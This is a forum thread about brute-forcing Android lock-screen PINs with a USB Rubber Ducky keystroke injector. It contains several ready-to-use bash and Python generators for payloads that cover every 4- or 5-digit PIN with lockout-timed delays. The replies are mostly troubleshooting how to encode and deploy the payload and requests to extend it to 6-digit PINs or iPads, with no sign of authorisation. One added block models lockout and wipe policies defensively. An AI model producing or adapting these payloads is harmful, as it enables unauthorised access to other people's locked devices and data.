Jaylu1979 Posted March 12, 2017

The Ducky script works great, major props for this, Darren. I've been using a powered 3-in-1 micro USB hub with an external battery to keep the phone charged for the time needed to brute force the PIN. How can I amend the Ducky script to capture the correct PIN as a text file on the Ducky?

kerravon Posted June 27, 2017

> On 06/12/2012 at 11:31 PM, Darren Kitchen said:
>
> I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.
>
> I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.
>
> With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.
>
> Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)
>
> ```bash
> echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
> ```

Hey Darren,

Any chance of putting your 600k script on GitHub so we can look at it?

Cheers

b0N3z Posted June 28, 2017

```bash
echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt
```

5 digit

Dave-ee Jones Posted June 30, 2017

> On 6/28/2017 at 0:36 PM, b0N3z said:
>
> ```bash
> echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt
> ```
>
> 5 digit

That will take a very long time..

b0N3z Posted June 30, 2017

> 10 hours ago, Dave-ee Jones said:
>
> That will take a very long time..

As per Darren, about 166hrs

Reynold S. Posted July 1, 2017

Hey, I made a script to generate the 4-digit combinations in Python, so if you have Python just copy the code and run it, and in the output you will have the combinations. In Python it was harder to make because Python is not made to do brute force and has its limits, but finally I made the code. (I am just 15 years old and a starter on Python, so possibly the code can be better than that.) Here is the code:

```python
"""
Change x=int(<a number>) below. Put only 1-9, copy all the code,
and then you have the payload.
"""
x = int(0)
number = int(0)

# PINs x000 to x009
while number <= 9:
    print("STRING", str(x) + "00" + str(number))
    print("ENTER")
    if number in list(range(0, 9, 5)):
        print("DELAY 34250")
        number += int(1)
    else:
        number += int(1)

if number == 10:
    # PINs x010 to x099
    while number <= int(100):
        print("STRING", str(x) + "0" + str(number))
        print("ENTER")
        if number in list(range(10, 100, 5)):
            print("DELAY 34250")
            number += int(1)
        else:
            number += int(1)
        if number == int(100):
            # PINs x100 to x999
            while number != int(1000):
                print("STRING", str(x) + str(number))
                print("ENTER")
                if number in list(range(100, 999, 5)):
                    print("DELAY 34250")
                    number += int(1)
                else:
                    number += int(1)
                if number == int(1000):
                    x += int(1)
                    break
```

TTT101907 Posted July 3, 2017

> On 12/12/2012 at 5:36 PM, keb0x80 said:
>
> I created a script to generate pretty much the same output using only bash loops/conditions
>
> ```bash
> #!/bin/bash
> count=0
> echo "DELAY 5000"
> for pin in {0000..9999}
> do
>     count=$((count+1))
>     echo "STRING $pin"
>     # After every other pin, do this
>     if [ $((count % 2)) -eq 0 ]; then
>         echo "DELAY 1000"
>         echo "ENTER"
>         echo "ENTER"
>     fi
>     # After 5 pins, do this
>     if [ $((count % 5)) -eq 0 ]; then
>         for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) ))
>         do
>             echo "DELAY 5000"
>             echo "ENTER"
>         done
>     fi
> done
> ```

I'm on the duck tool kit.com and when I put this in the encoder it rejects it as "does not recognize !in bash". What am I doing wrong?

TTT101907 Posted July 3, 2017

> On 12/6/2012 at 7:38 PM, Darren Kitchen said:
>
> No, this doesn't require anything special on the Android side. All of these Android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer. For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

> On 12/6/2012 at 5:31 PM, Darren Kitchen said:
>
> I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.
>
> I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.
>
> With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.
>
> Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)
>
> ```bash
> echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
> ```

I'm on duck tool kit.com and trying to use this script but it doesn't work. What am I doing wrong?

TTT101907 Posted July 4, 2017

> On 6/30/2017 at 0:15 PM, b0N3z said:
>
> as per Darren about 166hrs

I'm on the duck tool kit and I can't seem to get the script to work. Any insight?

b0N3z Posted July 4, 2017

The script is made to run in a bash terminal to create the text file needed to make the inject.bin file for the ducky. This won't work with just trying to convert the command.

TTT101907 Posted July 5, 2017

> On 12/6/2012 at 5:31 PM, Darren Kitchen said:
>
> I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.
>
> I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.
>
> With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.
>
> Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)
>
> ```bash
> echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
> ```

So how do I use this code on your duck tool kit.com site?

b0N3z Posted July 9, 2017

> On 7/5/2017 at 6:24 PM, TTT101907 said:
>
> So how do I use this code on your duck tool kit.com site?

Do you have Linux?

Debian8 Posted August 17, 2017

Hi, I'm a newbie :P .. How can I encode this code so it works and creates inject.bin, and then put it into an Android smartphone with the USB Rubber Ducky? Because for the code

```bash
#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e "
```

it says that is not language appropriate and I can't create the inject file on duckytools. Thanks

JayMac87 Posted January 14, 2018

Hello, can I use a Raspberry Pi 3 to brute force an Apple EFI?

Broti Posted January 14, 2018

This method won't work on my Android phone. It's set to use the SIM PIN, so 3 wrong tries and you'll need the PUK (aka SuperPIN).

But I have it saved locally in case I get the chance to use it.

fabrice Posted January 14, 2018

I think it's not for the SIM PIN, but only for Android device access.

Broti Posted January 14, 2018

> 3 hours ago, fabrice said:
>
> I think it's not for the sim pin, but only for android device access.

I know it's only for the Android-based access code option.

cmd97 Posted January 16, 2018

To summarize for new users: the code provided is designed to be executed within a Linux shell. It will then output a file named android_brute-force_0000-9999.txt

From there, take that and encode it on ducktoolkit.com.

There is one line for every PIN combination, which is why it's 600k.

I don't know if this payload still works. I'm going to try it on an S8+ with a USB -> USB-C converter and post the results.

Jay1 Posted January 30, 2018

When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help?

```bash
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
```

The original script^

Broti Posted January 30, 2018

> 8 hours ago, Jay1 said:
>
> When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please help

It generates the text file android_brute-force_0000-9999.txt, which you have to encode. The script you posted has to be executed in a shell.

StevenSeagalathon Posted February 22, 2018

Does anyone have an idea as to how you would do this if the keypad doesn't allow for numerical entry? For example, it won't recognize numbers; you have to use UDLR and then Enter to select a number of the PIN.

j0nNy_BaNaNa'$ Posted February 22, 2019

> On 1/16/2018 at 3:43 AM, cmd97 said:
>
> To summarize new users. The code provided are designed to be executed within a Linux shell. It will then output a file named android_brute-force_0000-9999.txt
>
> From there, take that and encode it on ducktoolkit.com.
>
> There is one line for every pin combination, why it's 600k.
>
> I don't know if this payload still works, I'm going to try it on an s8+ with a USB -> USB-C converter and post the results.

I doubt it will work on such a recent version ... Surely it works up to the KitKat version (4.4.2) and maybe (I'm not sure) up to 5.0, but the new Android versions, after some attempts, exponentially increase the waiting time between one attempt and another, and then you would have to fix the script even just to give it a try ....

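Added example, not part of any post in this thread: a small model of why the lockout policy decides the outcome, comparing the fixed 5-tries/30-second timeout behind the 16.6-hour and 166-hour figures with an escalating timeout like the one described in the post above. The doubling schedule, the one-day cap and all function names are assumptions (the thread does not give Android's actual schedule); `wipe_after=100` models the reset after 100 attempts that Darren says he had expected.

```python
# Added example: enforced waiting time for a PIN keyspace under lock-screen throttling.
# The doubling schedule and the one-day cap are assumptions, not Android's real values.

def fixed_timeout(seconds):
    """Same wait after every lockout, e.g. the thread's 5 tries / 30 s figures."""
    return lambda lockout_index: seconds

def doubling_timeout(base, cap):
    """Hypothetical escalating policy: the wait doubles per lockout, up to cap."""
    return lambda lockout_index: min(base * 2 ** min(lockout_index, 40), cap)

def enforced_wait(digits, tries_per_lockout, timeout, wipe_after=None):
    """Return (seconds of enforced waiting, fraction of keyspace reachable).

    wipe_after models a device that erases itself after that many failures,
    which bounds how much of the keyspace can ever be tried.
    """
    keyspace = 10 ** digits
    attempts = keyspace if wipe_after is None else min(keyspace, wipe_after)
    lockouts = attempts // tries_per_lockout
    waited = sum(timeout(i) for i in range(lockouts))
    return waited, attempts / keyspace

def hours(seconds):
    return seconds / 3600

if __name__ == "__main__":
    policies = {
        "fixed 30 s": fixed_timeout(30),
        "doubling, 30 s up to 1 day": doubling_timeout(30, 86400),
    }
    for digits in (4, 5, 6):
        for name, policy in policies.items():
            waited, _ = enforced_wait(digits, 5, policy)
            print(f"{digits}-digit PIN, {name}: {hours(waited):,.1f} h")
    waited, reach = enforced_wait(4, 5, fixed_timeout(30), wipe_after=100)
    print(f"4-digit PIN, wipe after 100 failures: {reach:.0%} of keyspace reachable")
```

With the fixed timeout the model reproduces the thread's numbers; with the assumed doubling schedule a 4-digit keyspace already costs years of enforced waiting, and a wipe threshold caps coverage at a fixed fraction regardless of time.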
Sh4dowR00t Posted April 16, 2019

Hello Darren, I love the show and all the information you guys put out. I just got my Rubber Ducky not long ago and have been messing around with it. I was wondering if there is a way to save the information gathered to the Rubber Ducky itself? And would I be able to, say, use an 8GB micro instead of the one it came with? Sorry if my question seems ignorant or anything, I'm just curious!!

Sujal011 Posted November 1, 2020

I want to know if it works with 6 digit? After some kind of code change (modifying code)

I feel better if someone will give me that script code of 6 digit

eeeeeesy Posted December 28, 2020

@Darren Kitchen is there a payload for brute-forcing old iPad PINs? And do you have the link? I would also need to know what ducky firmware to use for that. I'm thinking twin duck c_duck 2.0 firmware.

Edited December 28, 2020 by eeeeeesy